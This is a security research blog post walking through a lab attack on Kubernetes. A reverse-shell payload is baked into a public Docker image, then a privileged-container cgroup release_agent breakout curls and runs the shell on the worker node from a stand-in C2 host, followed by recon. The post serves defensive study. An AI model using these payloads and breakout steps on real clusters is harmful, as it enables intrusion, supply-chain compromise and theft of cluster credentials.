
Container Compromise to IaaS Recon

March 24, 2020

Part one of a series.
At Optiv our expertise is both advisory and hands-on. In this post one of our in-the-trenches-experts explains his approach to an important cybersecurity challenge.

Previous research on container security got me interested in the mechanics of a container breakout used to gain access to the underlying Kubernetes node. My interest was piqued when I tried to understand what this might look like from the attacker’s point of view. I started by asking: how could I infect a container? Once infected, how could I break out? And once out, how could I establish C2 on the host node?

I wasn’t only interested in the attacker perspective, although it’s usually where I start. I also wanted to understand the defenders’ perspective: if they’re armed with a solution like Aqua Security, where could the attack be stopped?

Let’s begin with the lab design. Below is an outline of my CI pipeline in AWS and the Azure AKS cluster used for command and control. For part one of this series Aqua is running, but isn’t set to enforce any prevention policies.

[Image: Lab design – CI pipeline in AWS and the Azure AKS cluster used for C2.]

On a side note, the entire scenario was built using two GitLab projects. One project created the malicious image, uploaded it to Docker Hub, and then used it in a Kubernetes deployment task. The second project created an additional image with Metasploit installed, a listener, an Apache server hosting a file used during the container breakout, and supporting scripts for this scenario.

In order for an attacker to succeed in this scenario several objectives must be completed. Each objective also presents an opportunity for the Blue Team to defend against the intrusion.

Initial Container Compromise

An easy way to compromise a container is to execute something malicious at runtime. I started by backdooring an Ubuntu Docker image with a malicious file that executes when the container starts. If someone uses the image in their environment, the attacker gains access to any container built from it. The malicious Docker image for this demo was created as a GitLab project containing three files.

[Image: GitLab project files for the malicious image.]

The .gitlab-ci.yml file (shown below), in conjunction with the Dockerfile, is responsible for creating the malicious image and pushing it to Docker Hub.

[Code Snippet: build stage of the .gitlab-ci.yml file.]

The .gitlab-ci.yml file creates the malicious ELF file by running msfvenom from the raesene/metasploit image prior to the Docker build. The resulting reverse_shell.elf is then copied into the Ubuntu base image by the Dockerfile shown below. The ELF file is made executable and runs when the container starts.
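Since the original snippet is only available as an image, here is a minimal sketch of what such a build stage might look like. The payload type, C2 address, credentials variables, and image tag are placeholders, not the author's actual values:

```yaml
# Hypothetical sketch of a .gitlab-ci.yml build stage.
stages:
  - build

build_image:
  stage: build
  image: docker:latest
  services:
    - docker:dind
  script:
    # Generate the payload with msfvenom via the raesene/metasploit image
    - >
      docker run --rm -v "$(pwd)":/out raesene/metasploit
      ./msfvenom -p linux/x64/meterpreter_reverse_http
      LHOST=c2.example.com LPORT=8443 -f elf -o /out/reverse_shell.elf
    # Build the backdoored Ubuntu image and push it to Docker Hub
    - docker login -u "$DOCKER_USER" -p "$DOCKER_PASS"
    - docker build -t kiralyd/ubuntu:latest .
    - docker push kiralyd/ubuntu:latest
```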

[Code Snippet: Dockerfile.]

Once built, the image is pushed to Docker Hub, making it available on a public repository.

Image: Publicly available DockerHub image with a reverse shell included.

If this image is used, reverse_shell.elf will execute and the attacker will have access to the container. Kubernetes in AWS was used as the orchestration tool to manage this demo cluster. An example deployment YAML file using this image is shown below. The deployment file instructs our Kubernetes cluster to create a container using the kiralyd/ubuntu:latest image from Docker Hub.

Code Snippet: deployment.yml used in the Kubernetes deployment task.
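A minimal sketch of such a deployment manifest is shown below. The resource names are placeholders, and the privileged security context is an assumption based on the breakout described later in this post:

```yaml
# Hypothetical sketch of the deployment.yml.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: ubuntu-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: ubuntu
  template:
    metadata:
      labels:
        app: ubuntu
    spec:
      containers:
        - name: ubuntu
          image: kiralyd/ubuntu:latest   # backdoored public image
          securityContext:
            privileged: true             # enables the later cgroup breakout
```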

This is an opportunistic attack at best, but the ramifications can be significant. The initial compromise takes place when a developer creates a container that uses a malicious Docker image from Docker Hub. Once the container is running, a reverse HTTP connection is made to our C2 server sitting in Azure.

Image: Initial incoming C2 connection from the container.

Image: Basic recon from container C2 connection.

Container Breakout and Node Compromise

Now that the reverse connection is established, it’s important to call out the security context the container is running under. The whoami command confirms the attacker is running as the root user, which matches the security context in the deployment YAML file shown earlier.

[Image: whoami output confirming root access inside the container.]

Running as privileged helps narrow the search for a container breakout. When I Googled [container breakouts] I stumbled on a great post from Trail of Bits breaking down a discovery by Felix Wilhelm on how the Linux cgroup v1 “notification on release” feature can be abused for a container breakout. I encourage everyone to read it.

While I won’t go into great detail on the exploit itself, the Trail of Bits proof-of-concept code is interesting. Line 12 (shown in the image below) is the command that’s executed on the host.

[Image: Trail of Bits proof-of-concept code.]

Once I verified that the PoC code worked, I wanted to change it into something more fitting for gaining C2 on the host (see below). As seen in line 6, the commands executed during this breakout instruct the worker node to install curl and download the same reverse_shell.elf that was used during the initial container compromise. Once downloaded, the file is made executable and then executed.

[Code Snippet: modified breakout proof of concept.]
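A sketch of what this modified PoC might look like is below. It follows the structure of the public Trail of Bits one-liner; the C2 URL is a placeholder, and it only works from inside a privileged container running as root on a host using cgroup v1 with an overlayfs root:

```shell
# Mount a cgroup v1 hierarchy and create a child cgroup
mkdir -p /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Ask the kernel to run the release_agent when the child cgroup empties
echo 1 > /tmp/cgrp/x/notify_on_release

# Resolve this container's filesystem path as seen from the host
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Payload executed on the HOST: fetch and run the same reverse shell
cat > /cmd <<'EOF'
#!/bin/sh
apt-get update && apt-get install -y curl
curl -o /tmp/reverse_shell.elf http://c2.example.com/reverse_shell.elf
chmod +x /tmp/reverse_shell.elf
/tmp/reverse_shell.elf
EOF
chmod a+x /cmd

# Add a short-lived process to the cgroup; when it exits, the host runs /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```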

These commands are executed through the C2 connection to the container. Once executed, a new session is opened, only this time it’s from the Kubernetes worker node the container is running on.

Image: Incoming connection from the Kubernetes worker node or host that the container is running on.

Image: Established C2 connection to the AWS worker node.

Kubernetes and Infrastructure Recon

Upon session interaction, running sysinfo and a quick “ls” on the /etc/kubernetes folder shows that we have compromised the host.

[Image: sysinfo output and /etc/kubernetes listing on the worker node.]

Now that the attacker has access to the worker node, they can view and download the ca.crt, kubelet-config.json, or even token information. Beyond that, the kubeconfig file reveals the EKS API server and cluster name that this node is attached to.

[Image: kubeconfig contents revealing the EKS server and cluster name.]
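From a worker node shell, recon along these lines surfaces that material. The paths below follow the standard EKS worker AMI layout and are assumptions, not taken from the original screenshots:

```shell
# Cluster CA certificate distributed to the node
ls -l /etc/kubernetes/pki/

# Kubelet's kubeconfig: reveals the EKS API server endpoint and cluster name
grep -E 'server:|cluster' /var/lib/kubelet/kubeconfig

# Kubelet configuration referenced in the post
cat /etc/kubernetes/kubelet/kubelet-config.json
```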

Even running a simple arp informs attackers of recent neighbors they might be able to pivot to.

[Image: arp output showing neighboring hosts on the node's subnet.]
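For reference, either of the following surfaces the node's recently seen neighbors; `ip neigh` is the modern equivalent of the classic `arp` output:

```shell
# Classic ARP table listing
arp -a

# Modern replacement via iproute2
ip neigh show
```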

Hopefully this analysis provides some insight into what’s possible with this sort of attack and the impact it can have. It’s imperative to have visibility into Kubernetes clusters, containers, images and runtime execution. If your cluster is running in AWS, Azure or GCP it’s also important that you understand the IAM Roles, Security Groups and VPCs corresponding to each cluster and the worker nodes associated with them.

The second blog in this series will demonstrate how Aqua Security can be used to provide visibility and prevent this scenario from affecting your operation.



By: Dan Kiraly

Senior Research Analyst
